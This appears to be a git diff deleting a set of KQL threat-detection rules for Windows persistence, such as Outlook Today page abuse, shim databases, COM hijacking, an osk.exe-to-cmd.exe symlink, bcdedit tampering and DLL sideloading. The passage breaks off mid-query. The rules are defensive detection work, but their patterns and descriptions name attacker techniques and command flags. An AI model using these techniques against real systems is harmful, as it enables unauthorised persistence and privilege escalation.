-| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql b/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql
deleted file mode 100644
index 55524640..00000000
--- a/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021/06/10
-// Level: high
-// Description: Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl".
-// Tags: attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Microsoft\\Office" and RegistryKey contains "\\Outlook\\Today") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Stamp") or RegistryKey endswith "UserDefinedUrl") and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql b/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
deleted file mode 100644
index 7010220a..00000000
--- a/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/08
-// Level: high
-// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql b/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql
deleted file mode 100644
index 40b586b7..00000000
--- a/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: medium
-// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
-// Tags: attack.persistence, attack.t1546.015
-DeviceRegistryEvents
-| where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)"
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql b/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql
deleted file mode 100644
index 0e1cdf91..00000000
--- a/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: high
-// Description: Detects the installation of a new shim database where the file is located in a non-default location
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom"))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql b/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql
deleted file mode 100644
index be805d00..00000000
--- a/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: medium
-// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
-The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
-
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom") and (not(RegistryValueData =~ ""))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_TypedPaths.kql b/Persistence/Potential_Persistence_Via_TypedPaths.kql
deleted file mode 100644
index dab4531e..00000000
--- a/Persistence/Potential_Persistence_Via_TypedPaths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: high
-// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 96f4cd8e..00000000
--- a/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: medium
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql b/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql
deleted file mode 100644
index f0a68dd4..00000000
--- a/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/01/10
-// Level: medium
-// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
-// Tags: attack.t1137.006, attack.persistence
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Microsoft\\Office\\Outlook\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Word\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Excel\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Powerpoint\\Addins" or RegistryKey contains "\\Software\\Microsoft\\VSTO\\Security\\Inclusion") and (not(((InitiatingProcessFolderPath =~ "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe" and RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt") or (InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") or (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\integrator.exe" or InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\visio.exe") or InitiatingProcessFolderPath endswith "\\Teams.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql b/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql
deleted file mode 100644
index 7040127d..00000000
--- a/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/07/01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
deleted file mode 100644
index 1a2be179..00000000
--- a/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql b/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
deleted file mode 100644
index c40a0f11..00000000
--- a/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql b/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
deleted file mode 100644
index 0be2e25f..00000000
--- a/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron
-// Date: 2019/02/07
-// Level: medium
-// Description: Detects potential malicious and unauthorized usage of bcdedit.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.persistence, attack.t1542.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe")
\ No newline at end of file
diff --git a/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql b/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql
deleted file mode 100644
index 128c30fe..00000000
--- a/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/07
-// Level: medium
-// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
-// Tags: attack.persistence, attack.t1574
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d"))
\ No newline at end of file
diff --git a/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql b/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql
deleted file mode 100644
index 3c143992..00000000
--- a/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Lednyov Alexey, oscd.community, Sreeman
-// Date: 2020/10/16
-// Level: high
-// Description: Detects potential persistence behavior using the windows telemetry registry key.
-Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
-This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
-The problem is, it will run any arbitrary command without restriction of location or type.
-
-// Tags: attack.persistence, attack.t1053.005
-DeviceRegistryEvents
-| where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql b/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql
deleted file mode 100644
index 3ae13744..00000000
--- a/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Greg (rule)
-// Date: 2022/07/21
-// Level: high
-// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
-If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
-Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
-
-// Tags: attack.persistence, attack.t1547
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}")
\ No newline at end of file
diff --git a/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql b/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql
deleted file mode 100644
index 38a023b8..00000000
--- a/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/06
-// Level: medium
-// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where RegistryKey contains "\\shell\\SentinelOneScan\\command" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent")))))
\ No newline at end of file
diff --git a/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql b/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
deleted file mode 100644
index 56927dce..00000000
--- a/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects installation of a new shim using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql b/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql
deleted file mode 100644
index 8729ce64..00000000
--- a/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Christopher Peacock '@securepeacock', SCYTHE
-// Date: 2021/10/24
-// Level: high
-// Description: Detects PowerShell writing startup shortcuts.
-This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
-Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
-In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
-
-// Tags: attack.persistence, attack.t1547.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk"
\ No newline at end of file
diff --git a/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql b/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql
deleted file mode 100644
index 9bfc80e6..00000000
--- a/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: medium
-// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll")
\ No newline at end of file
diff --git a/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith 
"\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or 
FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath 
endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath 
endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath 